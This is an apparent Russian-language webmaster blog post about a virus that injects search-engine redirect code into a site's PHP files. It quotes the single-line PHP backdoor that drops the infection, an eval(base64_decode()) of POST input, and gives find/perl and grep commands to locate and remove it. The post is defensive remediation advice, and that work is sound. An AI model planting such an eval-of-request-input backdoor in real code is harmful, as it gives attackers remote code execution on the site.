Уже довольно давно мучает нас один вирус. Суть его работы во внедрении во все php файлы кода, перебрасывающего пользователей из поисковиков на некие порно-ресурсы. Если же заходить напрямую вбив адрес в адресуню строку, то все открывается без проблем.
Само же заражение происходит через файл post.php или pst.php или какое то другое название, содержащий одну строку
eval (base64_decode(<!-- $_РOST["рhр"] -->));
Этот файл как правило лежит в папке images.
Как понять, что у вас именно этот вирус? Откройте файл index.php в корне сайта и скорее всего в самом начале вы увидете что-то вроде:
Соответственно избавиться от вируса можно прошерстив все файлы и удалив из них данный код.
Можно поступить двумя методами:
Скачать весь сайт на компьютер и, воспользовавшись утилитами типа Text Replacer и ему подобными, удалить всю эту гадость из файлов. Далее закачать все на место
Если есть доступ к SSH, находясь в корне сайта, запустить команду
find . -type f -name '*.php' -exec perl -pi -e 's/eval\(base64_decode\(\"DQp.*KfQ0KfQ==\"\)\)\;//g' '{}' \;
Она найдет все файлы с расширением php и удалит в них искомый вредоносный код
Второй вариант работает очень быстро, но не всем подойдет.
И не забудьте поменять пароль к FTP и админке сайта. Утечка скорее всего происходит через них. Ну и проверить комп на вирусы не помешает тоже.
Ещё одна полезная комбинация команд позволяет искать текст внутри файлов для выявления вируса
find . -type f -name '*.php' -exec grep -l 'искомая строка' {} \;
amiseo.ru
Copyright © 2016 Fashion Line Rights Reserved.